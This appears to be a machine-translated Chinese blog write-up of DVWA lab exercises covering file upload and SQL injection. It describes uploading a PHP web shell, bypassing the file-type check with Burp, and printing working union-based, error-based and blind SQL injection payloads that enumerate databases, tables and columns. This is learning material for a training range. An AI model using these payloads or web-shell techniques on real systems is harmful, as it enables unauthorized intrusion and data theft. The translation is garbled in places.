当前位置:网站首页>DVWA range exercise 4
DVWA range exercise 4
2022-07-04 12:40:00 【chenjyboke】
file upload( Upload files )
low
File upload vulnerability , Usually due to the type of upload file , The content is not strictly filtered , Check , So that the attacker can get the server's webshell jurisdiction , Therefore, the harm caused by file upload vulnerability is often devastating ,Apache,Tomcat,Nginx And so on are exposed file upload vulnerabilities .
Check the source code and find that there are no restrictions on the content of file types. Check for file upload vulnerabilities .
Make a word Trojan , The file format is php Upload files . Connect with an ant sword . Backstage .
Mdeium
Check the source code and find that the file type limit should be jepg Or for png
Edit a sentence: the Trojan horse is jpg Format upload , Use burp Capture the package and change the file format to php Format , After success, use ant sword to connect
SQL injection(sql Inject )
low
1、 Determine the type of Injection
Input 1 success , Input 1 and1=1 success Input 1’ Failure
It is judged as digital injection
2、 guess sql The number of fields in the query statement
Input 1’ order by 2# success Input 1’ order by 3# Failure , Determine that the number of fields is 2
3、 Get users , database , Version number
Input 1' union select 1,concat(user(),database(),version())#
4, Gets the tables in the database
1' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa' #
medium
1. After submission burp Grab the bag , modify id=1 Change it to 1 and 1=2 union select 1,concat(database(),floor(rand(0)*2))x from information_schema.tables group by x #
Check in the response package
Repeat the above steps
2. Number of blasting tables : id=1 Change it to 1 and 1=2 union select 1,concat((select count(table_name) from information_schema.tables where table_schema=database()),floor(rand(0)*2))x from information_schema.tables group by x#
3. Name of blasting table : id=1 Change it to 1 and 1=2 union select 1,concat((select group_concat(table_name) from information_schema.tables where table_schema=database()),floor(rand(0)*2))x from information_schema.tables group by x#
4. Blast users Field name
id=1 Change it to 1 and 1=2 union select 1,concat((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273 ),floor(rand(0)*2))x from information_schema.tables group by x#
SQL injection(sql Injection blind injection )
Determine the injection type and sql Inject the same
Judge the length of the database
Input 1’ and length(database())=1 #, Show that there is no ;
Input 1’ and length(database())=2 #, Show that there is no ;
Input 1’ and length(database())=3 #, Show that there is no ;
Input 1’ and length(database())=4 #, Show the presence of :
边栏推荐
- [Yunju entrepreneurial foundation notes] Chapter II entrepreneur test 15
- Global and Chinese market for naval vessel maintenance 2022-2028: Research Report on technology, participants, trends, market size and share
- The detailed installation process of Ninja security penetration system (Ninjitsu OS V3). Both old and new VM versions can be installed through personal testing, with download sources
- Haproxy cluster
- Uva536 binary tree reconstruction tree recovery
- 2022, 6G is heating up
- Fastlane 一键打包/发布APP - 使用记录及踩坑
- World document to picture
- R语言--readr包读写数据
- Global and Chinese markets for environmental disinfection robots 2022-2028: Research Report on technology, participants, trends, market size and share
猜你喜欢
记一次 Showing Recent Errors Only Command /bin/sh failed with exit code 1 问题
[Yunju entrepreneurial foundation notes] Chapter II entrepreneur test 18
I want to talk about yesterday
DC-5 target
16.内存使用与分段
The detailed installation process of Ninja security penetration system (Ninjitsu OS V3). Both old and new VM versions can be installed through personal testing, with download sources
R language -- readr package reads and writes data
[Yunju entrepreneurial foundation notes] Chapter II entrepreneur test 19
Servlet learning notes
01. Basics - MySQL overview
随机推荐
Bottom Logic -- Mind Map
[Chongqing Guangdong education] National Open University spring 2019 2727 tax basis reference questions
When synchronized encounters this thing, there is a big hole, pay attention!
Jetson TX2配置Tensorflow、Pytorch等常用库
Review of week 278 of leetcode II
Error: Failed to download metadata for repo ‘AppStream‘: Cannot download repomd. XML solution
Practice of retro SOAP Protocol
. Does net 4 have a built-in JSON serializer / deserializer- Does . NET 4 have a built-in JSON serializer/deserializer?
asp. Core is compatible with both JWT authentication and cookies authentication
01. Basics - MySQL overview
[solve the error of this pointing in the applet] SetData of undefined
[ES6] template string: `string`, a new symbol in es2015
The latest idea activation cracking tutorial, idea permanent activation code, the strongest in history
Detailed explanation of NPM installation and caching mechanism
Global and Chinese markets for environmental disinfection robots 2022-2028: Research Report on technology, participants, trends, market size and share
C language function
Kivy教程之 08 倒计时App实现timer调用(教程含源码)
Translation D29 (with AC code POJ 27:mode of sequence)
Hongke case study on storm impact in coastal areas of North Carolina using lidar
Servlet learning notes